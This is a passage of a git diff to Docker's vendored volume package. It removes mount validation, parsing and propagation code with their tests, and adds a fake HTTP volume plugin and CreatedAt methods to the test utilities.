t.Fatal(err) - } - - v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil) - if err != nil { - t.Fatal(err) - } - - if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil { - t.Fatal(err) - } - - s.Dereference(v, "volReference") - if err := s.Remove(v); err != nil { - t.Fatal(err) - } -} diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go deleted file mode 100644 index 8ebc1f20c7..0000000000 --- a/vendor/github.com/docker/docker/volume/store/store_unix.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build linux freebsd solaris - -package store - -// normaliseVolumeName is a platform specific function to normalise the name -// of a volume. This is a no-op on Unix-like platforms -func normaliseVolumeName(name string) string { - return name -} diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go index 2dbac02fdb..5bb38e3f33 100644 --- a/vendor/github.com/docker/docker/volume/testutils/testutils.go +++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go @@ -1,8 +1,15 @@ -package testutils +package testutils // import "github.com/docker/docker/volume/testutils" import ( + "encoding/json" + "errors" "fmt" + "net" + "net/http" + "time" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/volume" ) @@ -24,9 +31,12 @@ func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil } // Unmount unmounts the volume from the container func (NoopVolume) Unmount(_ string) error { return nil } -// Status proivdes low-level details about the volume +// Status provides low-level details about the volume func (NoopVolume) Status() map[string]interface{} { return nil } +// CreatedAt provides the time the volume (directory) was created at +func (NoopVolume) CreatedAt() (time.Time, error) { return time.Now(), nil } + // 
FakeVolume is a fake volume with a random name type FakeVolume struct { name string @@ -53,8 +63,13 @@ func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil } // Unmount unmounts the volume from the container func (FakeVolume) Unmount(_ string) error { return nil } -// Status proivdes low-level details about the volume -func (FakeVolume) Status() map[string]interface{} { return nil } +// Status provides low-level details about the volume +func (FakeVolume) Status() map[string]interface{} { + return map[string]interface{}{"datakey": "datavalue"} +} + +// CreatedAt provides the time the volume (directory) was created at +func (FakeVolume) CreatedAt() (time.Time, error) { return time.Now(), nil } // FakeDriver is a driver that generates fake volumes type FakeDriver struct { @@ -114,3 +129,99 @@ func (d *FakeDriver) Get(name string) (volume.Volume, error) { func (*FakeDriver) Scope() string { return "local" } + +type fakePlugin struct { + client *plugins.Client + name string + refs int +} + +// MakeFakePlugin creates a fake plugin from the passed in driver +// Note: currently only "Create" is implemented because that's all that's needed +// so far. If you need it to test something else, add it here, but probably you +// shouldn't need to use this except for very specific cases with v2 plugin handling. 
+func MakeFakePlugin(d volume.Driver, l net.Listener) (plugingetter.CompatPlugin, error) { + c, err := plugins.NewClient(l.Addr().Network()+"://"+l.Addr().String(), nil) + if err != nil { + return nil, err + } + mux := http.NewServeMux() + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + createReq := struct { + Name string + Opts map[string]string + }{} + if err := json.NewDecoder(r.Body).Decode(&createReq); err != nil { + fmt.Fprintf(w, `{"Err": "%s"}`, err.Error()) + return + } + _, err := d.Create(createReq.Name, createReq.Opts) + if err != nil { + fmt.Fprintf(w, `{"Err": "%s"}`, err.Error()) + return + } + w.Write([]byte("{}")) + }) + + go http.Serve(l, mux) + return &fakePlugin{client: c, name: d.Name()}, nil +} + +func (p *fakePlugin) Client() *plugins.Client { + return p.client +} + +func (p *fakePlugin) Name() string { + return p.name +} + +func (p *fakePlugin) IsV1() bool { + return false +} + +func (p *fakePlugin) ScopedPath(s string) string { + return s +} + +type fakePluginGetter struct { + plugins map[string]plugingetter.CompatPlugin +} + +// NewFakePluginGetter returns a plugin getter for fake plugins +func NewFakePluginGetter(pls ...plugingetter.CompatPlugin) plugingetter.PluginGetter { + idx := make(map[string]plugingetter.CompatPlugin, len(pls)) + for _, p := range pls { + idx[p.Name()] = p + } + return &fakePluginGetter{plugins: idx} +} + +// This ignores the second argument since we only care about volume drivers here, +// there shouldn't be any other kind of plugin in here +func (g *fakePluginGetter) Get(name, _ string, mode int) (plugingetter.CompatPlugin, error) { + p, ok := g.plugins[name] + if !ok { + return nil, errors.New("not found") + } + p.(*fakePlugin).refs += mode + return p, nil +} + +func (g *fakePluginGetter) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) { + panic("GetAllByCap shouldn't be called") +} + +func (g *fakePluginGetter) GetAllManagedPluginsByCap(capability 
string) []plugingetter.CompatPlugin { + panic("GetAllManagedPluginsByCap should not be called") +} + +func (g *fakePluginGetter) Handle(capability string, callback func(string, *plugins.Client)) { + panic("Handle should not be called") +} + +// FakeRefs checks ref count on a fake plugin. +func FakeRefs(p plugingetter.CompatPlugin) int { + // this should panic if something other than a `*fakePlugin` is passed in + return p.(*fakePlugin).refs +} diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go deleted file mode 100644 index 27a8c5d5b0..0000000000 --- a/vendor/github.com/docker/docker/volume/validate.go +++ /dev/null @@ -1,125 +0,0 @@ -package volume - -import ( - "errors" - "fmt" - "os" - "path/filepath" - - "github.com/docker/docker/api/types/mount" -) - -var errBindNotExist = errors.New("bind source path does not exist") - -type validateOpts struct { - skipBindSourceCheck bool - skipAbsolutePathCheck bool -} - -func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error { - opts := validateOpts{} - for _, o := range options { - o(&opts) - } - - if len(mnt.Target) == 0 { - return &errMountConfig{mnt, errMissingField("Target")} - } - - if err := validateNotRoot(mnt.Target); err != nil { - return &errMountConfig{mnt, err} - } - - if !opts.skipAbsolutePathCheck { - if err := validateAbsolute(mnt.Target); err != nil { - return &errMountConfig{mnt, err} - } - } - - switch mnt.Type { - case mount.TypeBind: - if len(mnt.Source) == 0 { - return &errMountConfig{mnt, errMissingField("Source")} - } - // Don't error out just because the propagation mode is not supported on the platform - if opts := mnt.BindOptions; opts != nil { - if len(opts.Propagation) > 0 && len(propagationModes) > 0 { - if _, ok := propagationModes[opts.Propagation]; !ok { - return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)} - } - } - } - if mnt.VolumeOptions != nil { - return 
&errMountConfig{mnt, errExtraField("VolumeOptions")} - } - - if err := validateAbsolute(mnt.Source); err != nil { - return &errMountConfig{mnt, err} - } - - // Do not allow binding to non-existent path - if !opts.skipBindSourceCheck { - fi, err := os.Stat(mnt.Source) - if err != nil { - if !os.IsNotExist(err) { - return &errMountConfig{mnt, err} - } - return &errMountConfig{mnt, errBindNotExist} - } - if err := validateStat(fi); err != nil { - return &errMountConfig{mnt, err} - } - } - case mount.TypeVolume: - if mnt.BindOptions != nil { - return &errMountConfig{mnt, errExtraField("BindOptions")} - } - - if len(mnt.Source) == 0 && mnt.ReadOnly { - return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")} - } - - if len(mnt.Source) != 0 { - if valid, err := IsVolumeNameValid(mnt.Source); !valid { - if err == nil { - err = errors.New("invalid volume name") - } - return &errMountConfig{mnt, err} - } - } - case mount.TypeTmpfs: - if len(mnt.Source) != 0 { - return &errMountConfig{mnt, errExtraField("Source")} - } - if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil { - return &errMountConfig{mnt, err} - } - default: - return &errMountConfig{mnt, errors.New("mount type unknown")} - } - return nil -} - -type errMountConfig struct { - mount *mount.Mount - err error -} - -func (e *errMountConfig) Error() string { - return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) -} - -func errExtraField(name string) error { - return fmt.Errorf("field %s must not be specified", name) -} -func errMissingField(name string) error { - return fmt.Errorf("field %s must not be empty", name) -} - -func validateAbsolute(p string) error { - p = convertSlash(p) - if filepath.IsAbs(p) { - return nil - } - return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p) -} diff --git a/vendor/github.com/docker/docker/volume/validate_test.go 
b/vendor/github.com/docker/docker/volume/validate_test.go deleted file mode 100644 index 8732500fc0..0000000000 --- a/vendor/github.com/docker/docker/volume/validate_test.go +++ /dev/null @@ -1,43 +0,0 @@ -package volume - -import ( - "errors" - "io/ioutil" - "os" - "strings" - "testing" - - "github.com/docker/docker/api/types/mount" -) - -func TestValidateMount(t *testing.T) { - testDir, err := ioutil.TempDir("", "test-validate-mount") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(testDir) - - cases := []struct { - input mount.Mount - expected error - }{ - {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, - {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil}, - {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, - {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, - {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, - {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist}, - {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, - {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, - } - for i, x := range cases { - err := validateMountConfig(&x.input) - if err == nil && x.expected == nil { - continue - } - if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { - t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i) - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go index f3227fe485..61c8243979 100644 --- a/vendor/github.com/docker/docker/volume/volume.go +++ 
b/vendor/github.com/docker/docker/volume/volume.go @@ -1,17 +1,7 @@ -package volume +package volume // import "github.com/docker/docker/volume" import ( - "fmt" - "os" - "path/filepath" - "strings" - "syscall" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/pkg/idtools" - "github.com/docker/docker/pkg/stringid" - "github.com/opencontainers/runc/libcontainer/label" - "github.com/pkg/errors" + "time" ) // DefaultDriverName is the driver name used for the driver @@ -29,7 +19,7 @@ const ( type Driver interface { // Name returns the name of the volume driver. Name() string - // Create makes a new volume with the given id. + // Create makes a new volume with the given name. Create(name string, opts map[string]string) (Volume, error) // Remove deletes the volume. Remove(vol Volume) (err error) @@ -64,6 +54,8 @@ type Volume interface { Mount(id string) (string, error) // Unmount unmounts the volume when it is no longer in use. Unmount(id string) error + // CreatedAt returns Volume Creation time + CreatedAt() (time.Time, error) // Status returns low-level status information about a volume Status() map[string]interface{} } @@ -75,249 +67,3 @@ type DetailedVolume interface { Scope() string Volume } - -// MountPoint is the intersection point between a volume and a container. It -// specifies which volume is to be used and where inside a container it should -// be mounted. -type MountPoint struct { - // Source is the source path of the mount. - // E.g. `mount --bind /foo /bar`, `/foo` is the `Source`. 
- Source string - // Destination is the path relative to the container root (`/`) to the mount point - // It is where the `Source` is mounted to - Destination string - // RW is set to true when the mountpoint should be mounted as read-write - RW bool - // Name is the name reference to the underlying data defined by `Source` - // e.g., the volume name - Name string - // Driver is the volume driver used to create the volume (if it is a volume) - Driver string - // Type of mount to use, see `Type` definitions in github.com/docker/docker/api/types/mount - Type mounttypes.Type `json:",omitempty"` - // Volume is the volume providing data to this mountpoint. - // This is nil unless `Type` is set to `TypeVolume` - Volume Volume `json:"-"` - - // Mode is the comma separated list of options supplied by the user when creating - // the bind/volume mount. - // Note Mode is not used on Windows - Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`" - - // Propagation describes how the mounts are propagated from the host into the - // mount point, and vice-versa. - // See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt - // Note Propagation is not used on Windows - Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string - - // Specifies if data should be copied from the container before the first mount - // Use a pointer here so we can tell if the user set this value explicitly - // This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated - CopyData bool `json:"-"` - // ID is the opaque ID used to pass to the volume driver. - // This should be set by calls to `Mount` and unset by calls to `Unmount` - ID string `json:",omitempty"` - - // Sepc is a copy of the API request that created this mount. 
- Spec mounttypes.Mount -} - -// Setup sets up a mount point by either mounting the volume if it is -// configured, or creating the source directory if supplied. -func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) { - if m.Volume != nil { - id := m.ID - if id == "" { - id = stringid.GenerateNonCryptoID() - } - path, err := m.Volume.Mount(id) - if err != nil { - return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source) - } - m.ID = id - return path, nil - } - if len(m.Source) == 0 { - return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined") - } - // system.MkdirAll() produces an error if m.Source exists and is a file (not a directory), - if m.Type == mounttypes.TypeBind { - // idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory) - // also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it - if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil { - if perr, ok := err.(*os.PathError); ok { - if perr.Err != syscall.ENOTDIR { - return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source) - } - } - } - } - if label.RelabelNeeded(m.Mode) { - if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil { - return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source) - } - } - return m.Source, nil -} - -// Path returns the path of a volume in a mount point. -func (m *MountPoint) Path() string { - if m.Volume != nil { - return m.Volume.Path() - } - return m.Source -} - -// ParseVolumesFrom ensures that the supplied volumes-from is valid. 
-func ParseVolumesFrom(spec string) (string, string, error) { - if len(spec) == 0 { - return "", "", fmt.Errorf("volumes-from specification cannot be an empty string") - } - - specParts := strings.SplitN(spec, ":", 2) - id := specParts[0] - mode := "rw" - - if len(specParts) == 2 { - mode = specParts[1] - if !ValidMountMode(mode) { - return "", "", errInvalidMode(mode) - } - // For now don't allow propagation properties while importing - // volumes from data container. These volumes will inherit - // the same propagation property as of the original volume - // in data container. This probably can be relaxed in future. - if HasPropagation(mode) { - return "", "", errInvalidMode(mode) - } - // Do not allow copy modes on volumes-from - if _, isSet := getCopyMode(mode); isSet { - return "", "", errInvalidMode(mode) - } - } - return id, mode, nil -} - -// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a -// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to -// validate the spec and create a MountPoint -func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) { - arr, err := splitRawSpec(convertSlash(raw)) - if err != nil { - return nil, err - } - - var spec mounttypes.Mount - var mode string - switch len(arr) { - case 1: - // Just a destination path in the container - spec.Target = arr[0] - case 2: - if ValidMountMode(arr[1]) { - // Destination + Mode is not a valid volume - volumes - // cannot include a mode. 
eg /foo:rw - return nil, errInvalidSpec(raw) - } - // Host Source Path or Name + Destination - spec.Source = arr[0] - spec.Target = arr[1] - case 3: - // HostSourcePath+DestinationPath+Mode - spec.Source = arr[0] - spec.Target = arr[1] - mode = arr[2] - default: - return nil, errInvalidSpec(raw) - } - - if !ValidMountMode(mode) { - return nil, errInvalidMode(mode) - } - - if filepath.IsAbs(spec.Source) { - spec.Type = mounttypes.TypeBind - } else { - spec.Type = mounttypes.TypeVolume - } - - spec.ReadOnly = !ReadWrite(mode) - - // cannot assume that if a volume driver is passed in that we should set it - if volumeDriver != "" && spec.Type == mounttypes.TypeVolume { - spec.VolumeOptions = &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{Name: volumeDriver}, - } - } - - if copyData, isSet := getCopyMode(mode); isSet { - if spec.VolumeOptions == nil { - spec.VolumeOptions = &mounttypes.VolumeOptions{} - } - spec.VolumeOptions.NoCopy = !copyData - } - if HasPropagation(mode) { - spec.BindOptions = &mounttypes.BindOptions{ - Propagation: GetPropagation(mode), - } - } - - mp, err := ParseMountSpec(spec, platformRawValidationOpts...) - if mp != nil { - mp.Mode = mode - } - if err != nil { - err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err) - } - return mp, err -} - -// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it. 
-func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) { - if err := validateMountConfig(&cfg, options...); err != nil { - return nil, err - } - mp := &MountPoint{ - RW: !cfg.ReadOnly, - Destination: clean(convertSlash(cfg.Target)), - Type: cfg.Type, - Spec: cfg, - } - - switch cfg.Type { - case mounttypes.TypeVolume: - if cfg.Source == "" { - mp.Name = stringid.GenerateNonCryptoID() - } else { - mp.Name = cfg.Source - } - mp.CopyData = DefaultCopyMode - - if cfg.VolumeOptions != nil { - if cfg.VolumeOptions.DriverConfig != nil { - mp.Driver = cfg.VolumeOptions.DriverConfig.Name - } - if cfg.VolumeOptions.NoCopy { - mp.CopyData = false - } - } - case mounttypes.TypeBind: - mp.Source = clean(convertSlash(cfg.Source)) - if cfg.BindOptions != nil { - if len(cfg.BindOptions.Propagation) > 0 { - mp.Propagation = cfg.BindOptions.Propagation - } - } - case mounttypes.TypeTmpfs: - // NOP - } - return mp, nil -} - -func errInvalidMode(mode string) error { - return fmt.Errorf("invalid mode: %v", mode) -} - -func errInvalidSpec(spec string) error { - return fmt.Errorf("invalid volume specification: '%s'", spec) -} diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go b/vendor/github.com/docker/docker/volume/volume_copy_unix.go deleted file mode 100644 index ad66e17637..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_copy_unix.go +++ /dev/null @@ -1,8 +0,0 @@ -// +build !windows - -package volume - -const ( - // DefaultCopyMode is the copy mode used by default for normal/named volumes - DefaultCopyMode = true -) diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go deleted file mode 100644 index 798638c878..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_copy_windows.go +++ /dev/null @@ -1,6 +0,0 @@ -package volume - -const ( - // DefaultCopyMode is the copy mode used by default for normal/named volumes - 
DefaultCopyMode = false -) diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go deleted file mode 100644 index d4b4d800b2..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_linux.go +++ /dev/null @@ -1,56 +0,0 @@ -// +build linux - -package volume - -import ( - "fmt" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string -// for mount(2). -func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) { - var rawOpts []string - if readOnly { - rawOpts = append(rawOpts, "ro") - } - - if opt != nil && opt.Mode != 0 { - rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode)) - } - - if opt != nil && opt.SizeBytes != 0 { - // calculate suffix here, making this linux specific, but that is - // okay, since API is that way anyways. - - // we do this by finding the suffix that divides evenly into the - // value, returing the value itself, with no suffix, if it fails. - // - // For the most part, we don't enforce any semantic to this values. - // The operating system will usually align this and enforce minimum - // and maximums. 
- var ( - size = opt.SizeBytes - suffix string - ) - for _, r := range []struct { - suffix string - divisor int64 - }{ - {"g", 1 << 30}, - {"m", 1 << 20}, - {"k", 1 << 10}, - } { - if size%r.divisor == 0 { - size = size / r.divisor - suffix = r.suffix - break - } - } - - rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix)) - } - return strings.Join(rawOpts, ","), nil -} diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go deleted file mode 100644 index 40ce5525a3..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_linux_test.go +++ /dev/null @@ -1,51 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - "testing" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -func TestConvertTmpfsOptions(t *testing.T) { - type testCase struct { - opt mounttypes.TmpfsOptions - readOnly bool - expectedSubstrings []string - unexpectedSubstrings []string - } - cases := []testCase{ - { - opt: mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, - readOnly: false, - expectedSubstrings: []string{"size=1m", "mode=700"}, - unexpectedSubstrings: []string{"ro"}, - }, - { - opt: mounttypes.TmpfsOptions{}, - readOnly: true, - expectedSubstrings: []string{"ro"}, - unexpectedSubstrings: []string{}, - }, - } - for _, c := range cases { - data, err := ConvertTmpfsOptions(&c.opt, c.readOnly) - if err != nil { - t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", - c.opt, c.readOnly, err) - } - t.Logf("data=%q", data) - for _, s := range c.expectedSubstrings { - if !strings.Contains(data, s) { - t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) - } - } - for _, s := range c.unexpectedSubstrings { - if strings.Contains(data, s) { - t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) - } - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go 
b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go deleted file mode 100644 index 1de57ab52b..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go +++ /dev/null @@ -1,47 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" -) - -// DefaultPropagationMode defines what propagation mode should be used by -// default if user has not specified one explicitly. -// propagation modes -const DefaultPropagationMode = mounttypes.PropagationRPrivate - -var propagationModes = map[mounttypes.Propagation]bool{ - mounttypes.PropagationPrivate: true, - mounttypes.PropagationRPrivate: true, - mounttypes.PropagationSlave: true, - mounttypes.PropagationRSlave: true, - mounttypes.PropagationShared: true, - mounttypes.PropagationRShared: true, -} - -// GetPropagation extracts and returns the mount propagation mode. If there -// are no specifications, then by default it is "private". -func GetPropagation(mode string) mounttypes.Propagation { - for _, o := range strings.Split(mode, ",") { - prop := mounttypes.Propagation(o) - if propagationModes[prop] { - return prop - } - } - return DefaultPropagationMode -} - -// HasPropagation checks if there is a valid propagation mode present in -// passed string. Returns true if a valid propagation mode specifier is -// present, false otherwise. 
-func HasPropagation(mode string) bool { - for _, o := range strings.Split(mode, ",") { - if propagationModes[mounttypes.Propagation(o)] { - return true - } - } - return false -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go deleted file mode 100644 index 46d0265062..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go +++ /dev/null @@ -1,65 +0,0 @@ -// +build linux - -package volume - -import ( - "strings" - "testing" -) - -func TestParseMountRawPropagation(t *testing.T) { - var ( - valid []string - invalid map[string]string - ) - - valid = []string{ - "/hostPath:/containerPath:shared", - "/hostPath:/containerPath:rshared", - "/hostPath:/containerPath:slave", - "/hostPath:/containerPath:rslave", - "/hostPath:/containerPath:private", - "/hostPath:/containerPath:rprivate", - "/hostPath:/containerPath:ro,shared", - "/hostPath:/containerPath:ro,slave", - "/hostPath:/containerPath:ro,private", - "/hostPath:/containerPath:ro,z,shared", - "/hostPath:/containerPath:ro,Z,slave", - "/hostPath:/containerPath:Z,ro,slave", - "/hostPath:/containerPath:slave,Z,ro", - "/hostPath:/containerPath:Z,slave,ro", - "/hostPath:/containerPath:slave,ro,Z", - "/hostPath:/containerPath:rslave,ro,Z", - "/hostPath:/containerPath:ro,rshared,Z", - "/hostPath:/containerPath:ro,Z,rprivate", - } - invalid = map[string]string{ - "/path:/path:ro,rshared,rslave": `invalid mode`, - "/path:/path:ro,z,rshared,rslave": `invalid mode`, - "/path:shared": "invalid volume specification", - "/path:slave": "invalid volume specification", - "/path:private": "invalid volume specification", - "name:/absolute-path:shared": "invalid volume specification", - "name:/absolute-path:rshared": "invalid volume specification", - "name:/absolute-path:slave": "invalid volume specification", - "name:/absolute-path:rslave": "invalid volume specification", - 
"name:/absolute-path:private": "invalid volume specification", - "name:/absolute-path:rprivate": "invalid volume specification", - } - - for _, path := range valid { - if _, err := ParseMountRaw(path, "local"); err != nil { - t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if _, err := ParseMountRaw(path, "local"); err == nil { - t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) - } - } - } -} diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go deleted file mode 100644 index 7311ffc2e0..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go +++ /dev/null @@ -1,24 +0,0 @@ -// +build !linux - -package volume - -import mounttypes "github.com/docker/docker/api/types/mount" - -// DefaultPropagationMode is used only in linux. In other cases it returns -// empty string. -const DefaultPropagationMode mounttypes.Propagation = "" - -// propagation modes not supported on this platform. -var propagationModes = map[mounttypes.Propagation]bool{} - -// GetPropagation is not supported. Return empty string. -func GetPropagation(mode string) mounttypes.Propagation { - return DefaultPropagationMode -} - -// HasPropagation checks if there is a valid propagation mode present in -// passed string. Returns true if a valid propagation mode specifier is -// present, false otherwise. 
-func HasPropagation(mode string) bool { - return false -} diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go deleted file mode 100644 index 54df38053f..0000000000 --- a/vendor/github.com/docker/docker/volume/volume_test.go +++ /dev/null @@ -1,269 +0,0 @@ -package volume - -import ( - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - - "github.com/docker/docker/api/types/mount" -) - -func TestParseMountRaw(t *testing.T) { - var ( - valid []string - invalid map[string]string - ) - - if runtime.GOOS == "windows" { - valid = []string{ - `d:\`, - `d:`, - `d:\path`, - `d:\path with space`, - // TODO Windows post TP5 - readonly support `d:\pathandmode:ro`, - `c:\:d:\`, - `c:\windows\:d:`, - `c:\windows:d:\s p a c e`, - `c:\windows:d:\s p a c e:RW`, - `c:\program files:d:\s p a c e i n h o s t d i r`, - `0123456789name:d:`, - `MiXeDcAsEnAmE:d:`, - `name:D:`, - `name:D::rW`, - `name:D::RW`, - // TODO Windows post TP5 - readonly support `name:D::RO`, - `c:/:d:/forward/slashes/are/good/too`, - // TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`, - `c:\Windows`, // With capital - `c:\Program Files (x86)`, // With capitals and brackets - } - invalid = map[string]string{ - ``: "invalid volume specification: ", - `.`: "invalid volume specification: ", - `..\`: "invalid volume specification: ", - `c:\:..\`: "invalid volume specification: ", - `c:\:d:\:xyzzy`: "invalid volume specification: ", - `c:`: "cannot be `c:`", - `c:\`: "cannot be `c:`", - `c:\notexist:d:`: `source path does not exist`, - `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, - `name<:d:`: `invalid volume specification`, - `name>:d:`: `invalid volume specification`, - `name::d:`: `invalid volume specification`, - `name":d:`: `invalid volume specification`, - `name\:d:`: `invalid volume specification`, - `name*:d:`: `invalid volume specification`, - `name|:d:`: `invalid volume 
specification`, - `name?:d:`: `invalid volume specification`, - `name/:d:`: `invalid volume specification`, - `d:\pathandmode:rw`: `invalid volume specification`, - `con:d:`: `cannot be a reserved word for Windows filenames`, - `PRN:d:`: `cannot be a reserved word for Windows filenames`, - `aUx:d:`: `cannot be a reserved word for Windows filenames`, - `nul:d:`: `cannot be a reserved word for Windows filenames`, - `com1:d:`: `cannot be a reserved word for Windows filenames`, - `com2:d:`: `cannot be a reserved word for Windows filenames`, - `com3:d:`: `cannot be a reserved word for Windows filenames`, - `com4:d:`: `cannot be a reserved word for Windows filenames`, - `com5:d:`: `cannot be a reserved word for Windows filenames`, - `com6:d:`: `cannot be a reserved word for Windows filenames`, - `com7:d:`: `cannot be a reserved word for Windows filenames`, - `com8:d:`: `cannot be a reserved word for Windows filenames`, - `com9:d:`: `cannot be a reserved word for Windows filenames`, - `lpt1:d:`: `cannot be a reserved word for Windows filenames`, - `lpt2:d:`: `cannot be a reserved word for Windows filenames`, - `lpt3:d:`: `cannot be a reserved word for Windows filenames`, - `lpt4:d:`: `cannot be a reserved word for Windows filenames`, - `lpt5:d:`: `cannot be a reserved word for Windows filenames`, - `lpt6:d:`: `cannot be a reserved word for Windows filenames`, - `lpt7:d:`: `cannot be a reserved word for Windows filenames`, - `lpt8:d:`: `cannot be a reserved word for Windows filenames`, - `lpt9:d:`: `cannot be a reserved word for Windows filenames`, - `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, - } - - } else { - valid = []string{ - "/home", - "/home:/home", - "/home:/something/else", - "/with space", - "/home:/with space", - "relative:/absolute-path", - "hostPath:/containerPath:ro", - "/hostPath:/containerPath:rw", - "/rw:/ro", - } - invalid = map[string]string{ - "": "invalid volume specification", - "./": "mount path must be 
